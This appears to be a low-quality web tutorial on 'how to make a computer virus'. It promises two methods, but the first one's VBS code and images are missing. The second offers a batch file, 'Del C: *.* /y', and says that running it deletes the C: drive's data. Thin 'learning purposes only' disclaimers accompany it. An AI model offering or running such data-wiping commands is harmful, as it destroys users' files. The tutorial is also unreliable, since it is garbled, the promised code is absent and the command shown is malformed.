How to Make A Computer Virus

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How to make a virus a most demanding and training question for all computer geeks. Today we are bring the best trick or method for how to make a computer virus easily. Now it is easy to create a virus and every second person who is sitting with his PC or laptop create new kind of virus in easy step not only it is easy but the different kind of virus created is quite harmful and they delete and access the various confidential information of a person.

About Virus: Virus nothing but malicious program which enter into a system without permission and affect the data or information and the working of the operating system OS. Here we shared the best and simplest way of making a virus for free.

Note: We do not recommend for promote this method this tutorial is only for learning process and we are not responsible for any kind of damage or delete the information or data.

There are two simple method to create a virus.

#Method 1:

How to Make A Computer Virus Prank with Your Computer.

Open Notepad and type/copy the Below code,

Now Paste the code and

Save as FileName.vbs
Run File FileName.vbs & See Magic as below images shows.


#Method 2:
Open Notepad on Your PC
@Echo off
Del C: *.* /y

Save file as FileName.bat
Now Run FileName.bat file and Your C: Drive data will be delete.

Note: This Article is made for Learning Purposes Not for illegal use. Be aware from any kind of risk.

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